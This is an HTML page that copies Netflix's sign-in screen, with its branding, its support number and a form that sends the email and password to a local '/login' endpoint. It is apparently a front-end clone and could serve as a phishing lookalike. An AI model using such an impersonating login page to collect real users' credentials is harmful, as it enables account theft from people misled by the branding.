<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="static/css/style.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css" 
          integrity="sha512-iBBXm8fW90+nuLcSKlbmrPcLa0OT92xO1BIsZ+ywDWZCvqsWgccV3gFoRBv0z+8dLJgyAHIhR35VZc2oM/gI1w==" 
          crossorigin="anonymous">
    <link rel="icon" href="static/img/logo.png" type="image/png">
    <title>Netflix</title>
</head>
<body>
    <div class="upper">
        <div class="logo">
            <a href="#">
                <img src="static/img/Netflix-Logo.png" class="img-logo" alt="Netflix Logo">
            </a>
        </div>
        <div class="login-div">
    <form method="POST" action="/login">
    <h1>Sign In</h1>
    <div class="input-text">
        <input type="text" id="Login" name="login" placeholder="Email or phone number" 
               onfocus="inputOnFocus(this)" onblur="inputOnBlur(this)">
        <div class="warning-input" id="warningEmail" style="display: none;">
            Please enter a valid email or phone number.
        </div>
    </div>
    <div class="input-text">
        <input type="password" id="Password" name="password" placeholder="Password" 
               onfocus="inputOnFocus(this)" onblur="inputOnBlur(this)">
        <div class="warning-input" id="warningPassword" style="display: none;">
            Your password must contain between 4 and 60 characters.
        </div>
    </div>
    <div>
        <button class="signin-button" type="submit">Sign In</button>
    </div>
     </form>
    <div class="bottom">
        <div class="bottom-width">
            Questions? Call <a href="tel:1-844-542-4813" class="tel-link">1-844-542-4813</a>
            <ul class="bottom-flex">
                <li class="list-bottom"><a href="#" class="link-bottom">FAQ</a></li>
                <li class="list-bottom"><a href="#" class="link-bottom">Help Center</a></li>
                <li class="list-bottom"><a href="#" class="link-bottom">Terms of Use</a></li>
                <li class="list-bottom"><a href="#" class="link-bottom">Privacy</a></li>
                <li class="list-bottom"><a href="#" class="link-bottom">Cookie Preferences</a></li>
                <li class="list-bottom"><a href="#" class="link-bottom">Corporate information</a></li>
            </ul>
            <select class="select-language">
                <option value="en">English</option>
                <option value="fr">Français</option>
            </select>
        </div>
    </div>
    <script src="static/js/script.js" defer></script>
</body>
</html>
